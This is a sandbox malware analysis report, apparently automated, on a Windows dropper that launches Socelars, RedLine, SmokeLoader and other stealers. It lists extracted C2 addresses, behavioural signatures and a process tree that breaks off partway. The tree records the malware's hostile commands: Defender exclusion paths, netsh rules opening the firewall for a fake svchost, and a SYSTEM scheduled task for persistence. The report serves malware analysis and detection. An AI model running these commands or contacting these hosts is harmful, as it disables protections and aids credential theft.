Resubmissions

10-11-2021 14:52

211110-r84p8ahcb5 10

10-11-2021 14:46

211110-r5g22seddm 10

10-11-2021 14:39

211110-r1a3yaedcq 6

10-11-2021 14:22

211110-rptqxahbf9 10

Analysis

  • max time kernel
    601s
  • max time network
    615s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    10-11-2021 14:52

General

  • Target

    022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

  • Size

    403KB

  • MD5

    f957e397e71010885b67f2afe37d8161

  • SHA1

    a8bf84b971b37ac6e7f66c5e5a7e971a7741401e

  • SHA256

    022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66

  • SHA512

    8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6

Malware Config

Extracted

Family

socelars

C2

http://www.hhgenice.top/

Extracted

Family

redline

C2

tatreriash.xyz:80

Extracted

Family

redline

Botnet

1011h

C2

charirelay.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://nalirou70.top/

http://xacokuo80.top/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • rl_trojan 1 IoCs

    redline stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 42 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 5 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 40 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 37 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
    "C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Users\Admin\Pictures\Adobe Films\Ouvwjy_89uDNL70EEFA2qHL5.exe
      "C:\Users\Admin\Pictures\Adobe Films\Ouvwjy_89uDNL70EEFA2qHL5.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2000
    • C:\Users\Admin\Pictures\Adobe Films\qzCQ9wqiLMPlyVDD8ZFRIOqV.exe
      "C:\Users\Admin\Pictures\Adobe Films\qzCQ9wqiLMPlyVDD8ZFRIOqV.exe"
      2⤵
      • Executes dropped EXE
      PID:1772
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 296
        3⤵
        • Program crash
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious use of AdjustPrivilegeToken
        PID:4884
    • C:\Users\Admin\Pictures\Adobe Films\FJEIGTwa1q3oVzOT5c3cc37b.exe
      "C:\Users\Admin\Pictures\Adobe Films\FJEIGTwa1q3oVzOT5c3cc37b.exe"
      2⤵
      • Executes dropped EXE
      PID:5100
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 296
        3⤵
        • Program crash
        • Checks processor information in registry
        • Enumerates system info in registry
        PID:2544
    • C:\Users\Admin\Pictures\Adobe Films\QO8u8gtb7uObQDhzvhRv4igC.exe
      "C:\Users\Admin\Pictures\Adobe Films\QO8u8gtb7uObQDhzvhRv4igC.exe"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of SetThreadContext
      PID:2060
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3⤵
          PID:1936
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 560
          3⤵
          • Program crash
          PID:3940
      • C:\Users\Admin\Pictures\Adobe Films\EruXS7l1FPOtK_uzRDbujkGd.exe
        "C:\Users\Admin\Pictures\Adobe Films\EruXS7l1FPOtK_uzRDbujkGd.exe"
        2⤵
        • Executes dropped EXE
        PID:1816
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 296
          3⤵
          • Drops file in Windows directory
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2556
      • C:\Users\Admin\Pictures\Adobe Films\amD4i2PTHWZxAeh6OYXGhkWJ.exe
        "C:\Users\Admin\Pictures\Adobe Films\amD4i2PTHWZxAeh6OYXGhkWJ.exe"
        2⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:2004
      • C:\Users\Admin\Pictures\Adobe Films\ljPNKhG9hJ6PhlrgtRr5cIFm.exe
        "C:\Users\Admin\Pictures\Adobe Films\ljPNKhG9hJ6PhlrgtRr5cIFm.exe"
        2⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:2296
      • C:\Users\Admin\Pictures\Adobe Films\7LqbaIUgDyMj8g6M1AWB5VC1.exe
        "C:\Users\Admin\Pictures\Adobe Films\7LqbaIUgDyMj8g6M1AWB5VC1.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1660
          3⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          PID:2848
      • C:\Users\Admin\Pictures\Adobe Films\0d6h2XMXnU08oZQ4umyeKupB.exe
        "C:\Users\Admin\Pictures\Adobe Films\0d6h2XMXnU08oZQ4umyeKupB.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2284
      • C:\Users\Admin\Pictures\Adobe Films\0yNgvBPcRWcsyU3553kqC43i.exe
        "C:\Users\Admin\Pictures\Adobe Films\0yNgvBPcRWcsyU3553kqC43i.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:4836
        • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
          "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
          3⤵
          • Executes dropped EXE
          PID:4552
      • C:\Users\Admin\Pictures\Adobe Films\enkrj5IxvWlIKv5oouKejJ5B.exe
        "C:\Users\Admin\Pictures\Adobe Films\enkrj5IxvWlIKv5oouKejJ5B.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        PID:1648
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
          3⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          PID:3672
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
          3⤵
            PID:4812
          • C:\Windows\System32\netsh.exe
            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
            3⤵
              PID:1016
            • C:\Windows\System32\netsh.exe
              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
              3⤵
                PID:4564
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                3⤵
                • Suspicious use of SetThreadContext
                • Creates scheduled task(s)
                PID:428
              • C:\Windows\System\svchost.exe
                "C:\Windows\System\svchost.exe" formal
                3⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                PID:492
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                  4⤵
                    PID:4544
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                    4⤵
                      PID:3736
                    • C:\Windows\System32\netsh.exe
                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                      4⤵
                        PID:4056
                      • C:\Windows\System32\netsh.exe
                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                        4⤵
                          PID:5204
                    • C:\Users\Admin\Pictures\Adobe Films\yvhLYbbmmCfOlUgWABtSMRDf.exe
                      "C:\Users\Admin\Pictures\Adobe Films\yvhLYbbmmCfOlUgWABtSMRDf.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:2924
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 300
                        3⤵
                        • Program crash
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:4004
                    • C:\Users\Admin\Pictures\Adobe Films\Q3pIIimUP0tQUT95n2NUUh2j.exe
                      "C:\Users\Admin\Pictures\Adobe Films\Q3pIIimUP0tQUT95n2NUUh2j.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:3152
                    • C:\Users\Admin\Pictures\Adobe Films\NI0XHntA_fwdq3dAeQwg1aCs.exe
                      "C:\Users\Admin\Pictures\Adobe Films\NI0XHntA_fwdq3dAeQwg1aCs.exe"
                      2⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      PID:3656
                    • C:\Users\Admin\Pictures\Adobe Films\WPm21lmsXt4hSyDK5j7tjJO9.exe
                      "C:\Users\Admin\Pictures\Adobe Films\WPm21lmsXt4hSyDK5j7tjJO9.exe"
                      2⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3416
                    • C:\Users\Admin\Pictures\Adobe Films\04L8wfx8yzTV7egq7doWxMGm.exe
                      "C:\Users\Admin\Pictures\Adobe Films\04L8wfx8yzTV7egq7doWxMGm.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:4056
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 280
                        3⤵
                        • Program crash
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:2888
                    • C:\Users\Admin\Pictures\Adobe Films\QyJbYA0cr9LsSfWa6gVbLrL2.exe
                      "C:\Users\Admin\Pictures\Adobe Films\QyJbYA0cr9LsSfWa6gVbLrL2.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:836
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 836 -s 296
                        3⤵
                        • Program crash
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:2268
                    • C:\Users\Admin\Pictures\Adobe Films\FL7nNGIgUpO6QiLsiNqM69Ra.exe
                      "C:\Users\Admin\Pictures\Adobe Films\FL7nNGIgUpO6QiLsiNqM69Ra.exe"
                      2⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3332
                    • C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe
                      "C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2628
                      • C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe
                        "C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe"
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2148
                    • C:\Users\Admin\Pictures\Adobe Films\aBgveQvYXSWQgZEuLsY6B7w_.exe
                      "C:\Users\Admin\Pictures\Adobe Films\aBgveQvYXSWQgZEuLsY6B7w_.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Modifies system certificate store
                      PID:5056
                      • C:\Users\Admin\Documents\ewmRSwZubmvS4cOEYuAWcqn3.exe
                        "C:\Users\Admin\Documents\ewmRSwZubmvS4cOEYuAWcqn3.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:1496
                        • C:\Users\Admin\Pictures\Adobe Films\2fALarXMuVsK8Kr6mdnCh8QA.exe
                          "C:\Users\Admin\Pictures\Adobe Films\2fALarXMuVsK8Kr6mdnCh8QA.exe"
                          4⤵
                          • Suspicious use of NtCreateProcessExOtherParentProcess
                          • Executes dropped EXE
                          PID:3968
                        • C:\Users\Admin\Pictures\Adobe Films\wb9Z4W6sHdzd2qgFhpqZc9DO.exe
                          "C:\Users\Admin\Pictures\Adobe Films\wb9Z4W6sHdzd2qgFhpqZc9DO.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:784
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 1732
                            5⤵
                            • Program crash
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            PID:5844
                        • C:\Users\Admin\Pictures\Adobe Films\KxSo365gOHwonWD80HicVHZz.exe
                          "C:\Users\Admin\Pictures\Adobe Films\KxSo365gOHwonWD80HicVHZz.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:2084
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 296
                            5⤵
                            • Program crash
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            PID:1468
                        • C:\Users\Admin\Pictures\Adobe Films\V3hMvyVpqo4RRJQ0L41za8qq.exe
                          "C:\Users\Admin\Pictures\Adobe Films\V3hMvyVpqo4RRJQ0L41za8qq.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:2796
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 292
                            5⤵
                            • Program crash
                            PID:5032
                        • C:\Users\Admin\Pictures\Adobe Films\zxNtqQzQWzlPqP0HPwIC8Sc1.exe
                          "C:\Users\Admin\Pictures\Adobe Films\zxNtqQzQWzlPqP0HPwIC8Sc1.exe"
                          4⤵
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          PID:3248
                        • C:\Users\Admin\Pictures\Adobe Films\yCYU6qOUstYnFfwx6lvQtxly.exe
                          "C:\Users\Admin\Pictures\Adobe Films\yCYU6qOUstYnFfwx6lvQtxly.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:3168
                        • C:\Users\Admin\Pictures\Adobe Films\f3ESHOZX_yJCskhbBLnqpeMx.exe
                          "C:\Users\Admin\Pictures\Adobe Films\f3ESHOZX_yJCskhbBLnqpeMx.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3956
                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                            5⤵
                              PID:5700
                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of FindShellTrayWindow
                                PID:2220
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff9f3afdec0,0x7ff9f3afded0,0x7ff9f3afdee0
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:400
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:2
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  PID:1440
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --mojo-platform-channel-handle=1920 /prefetch:8
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5836
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --mojo-platform-channel-handle=2336 /prefetch:8
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2292
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2628
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1980 /prefetch:1
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3752
                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,277253440613844845,10256362655988104613,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2220_2123047850" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3052 /prefetch:2
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  PID:1540
                          • C:\Users\Admin\Pictures\Adobe Films\4f8fGuX7mGm7DDlW8H2XAO5T.exe
                            "C:\Users\Admin\Pictures\Adobe Films\4f8fGuX7mGm7DDlW8H2XAO5T.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:5380
                            • C:\Users\Admin\AppData\Local\Temp\is-PTM5S.tmp\4f8fGuX7mGm7DDlW8H2XAO5T.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-PTM5S.tmp\4f8fGuX7mGm7DDlW8H2XAO5T.tmp" /SL5="$30272,506127,422400,C:\Users\Admin\Pictures\Adobe Films\4f8fGuX7mGm7DDlW8H2XAO5T.exe"
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:5600
                              • C:\Users\Admin\AppData\Local\Temp\is-METLB.tmp\DYbALA.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-METLB.tmp\DYbALA.exe" /S /UID=2709
                                6⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Drops file in Program Files directory
                                PID:6120
                                • C:\Users\Admin\AppData\Local\Temp\ff-afc52-5b9-a51ad-a5a1a8e0cc8b8\SHaexoshuvysho.exe
                                  "C:\Users\Admin\AppData\Local\Temp\ff-afc52-5b9-a51ad-a5a1a8e0cc8b8\SHaexoshuvysho.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5160
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                    8⤵
                                    • Adds Run key to start application
                                    • Enumerates system info in registry
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    PID:6044
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e5fd46f8,0x7ff9e5fd4708,0x7ff9e5fd4718
                                      9⤵
                                        PID:5484
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                                        9⤵
                                          PID:6212
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
                                          9⤵
                                            PID:6236
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,15751847945442655653,12830131228461126754,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
                                            9⤵
                                              PID:6412
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
